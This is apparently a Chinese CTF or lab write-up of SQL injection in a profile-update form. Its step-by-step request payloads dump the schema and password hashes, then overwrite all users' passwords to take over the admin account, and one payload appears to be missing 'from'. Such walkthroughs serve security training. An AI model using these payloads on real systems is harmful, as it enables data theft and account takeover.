测试无结果
扫描目录，得到源码

找到注入点

思路：更新资料的时候可以同时更新所有密码
我们需要知道密码的字段名

爆库
nickname=asdf&age=111,description=(select database())#&description=aaa&token=31ad6e5a2534a91ed634aca0b27c14a9

爆表
nickname=asdf&age=111,description=(select group_concat(table_name) from information_schema.tables where table_schema=database())#&description=aaa&token=31ad6e5a2534a91ed634aca0b27c14a9

爆字段
nickname=asdf&age=111,description=(select group_concat(column_name) from information_schema.columns where table_name=0x7573657273)#&description=aaa&token=31ad6e5a2534a91ed634aca0b27c14a9
users要换成十六进制0x7573657273

爆password字段
nickname=asdf&age=111,description=(select group_concat(password) users)#&description=aaa&token=31ad6e5a2534a91ed634aca0b27c14a9

发现密文以md5(password)形式存储在数据库中
更新所有密码
nickname=asdf&age=111,password=0x3437626365356337346635383966343836376462643537653963613966383038#&description=aaa&token=31ad6e5a2534a91ed634aca0b27c14a9

重启靶机
登录admin账户